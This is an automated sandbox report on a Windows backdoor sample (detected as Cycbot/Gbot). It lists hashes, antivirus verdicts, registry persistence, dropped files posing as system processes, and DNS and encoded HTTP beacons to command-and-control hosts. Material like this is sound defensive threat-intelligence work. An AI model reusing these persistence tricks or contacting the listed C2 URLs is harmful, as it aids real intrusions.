Analysis Date: 2014-06-15 21:01:04
MD5: bd20e738e880e730f0be210471dd3a91
SHA1: 1ba9e6574e10a92e04f847b46131ef05530a3426

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: c868214bc51735b1f14e4ad29f7cb031 sha1: 0f9bf14f2b0ec5c077a77c4b6f5aa3b357e1f1ba size: 120832
Section .tls: md5: 4984f7e85d061a96d5863e52547f2986 sha1: a86ba2fa95527e29267482055aef6dacff03678a size: 1024
Section .data: md5: 7bd220564461c331bb82abb10bd39fd6 sha1: 33d3be570ad81a0b5a5e4a1d5af17e2a4325d3ad size: 75264
Section .reloc: md5: 85a13e4ced8b736f61afc5aa73d1d92e sha1: bfab7b3d24e84bacd824a1e6e350d25671707b52 size: 1024
Timestamp: 2005-09-01 06:05:38
PEhash: a294f09591d5d96e85d2e116a703f230a88d7cc4
IMPhash: cdd26f2da21baca388af07543e2cfa2c
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen8
AV CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-453
AV Dr. Web: BackDoor.Gbot.70
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.SRP
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Heur.Conjar.5
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Agent
AV Kaspersky: Backdoor.Win32.Gbot.odl
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: win32/Gbot.AX
AV Rising: Trojan.Win32.Generic.12959C8E
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Trojan
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): BScope.DeadCryptor.01597

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: regsysonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: japanesegreenteaonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: japanesegreenteaonline.com (Type: A) ➝ 173.247.248.36
DNS: zonedg.com (Type: A) ➝ 208.73.211.165
DNS: zonedg.com (Type: A) ➝ 208.73.211.168
DNS: zonedg.com (Type: A) ➝ 208.73.211.175
DNS: zonedg.com (Type: A) ➝ 208.73.210.215
DNS: zonedg.com (Type: A) ➝ 208.73.210.218
DNS: zonedg.com (Type: A) ➝ 208.73.211.165
DNS: zonedg.com (Type: A) ➝ 208.73.211.168
DNS: zonedg.com (Type: A) ➝ 208.73.211.175
DNS: zonedg.com (Type: A) ➝ 208.73.210.215
DNS: zonedg.com (Type: A) ➝ 208.73.210.218
DNS: regsysonline.com (Type: A)
HTTP GET: http://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v96=9&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNzFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 173.247.248.36:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.165:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.165:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.211.165:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.211.165:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.165:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.211.165:80

Raw Pcap

Strings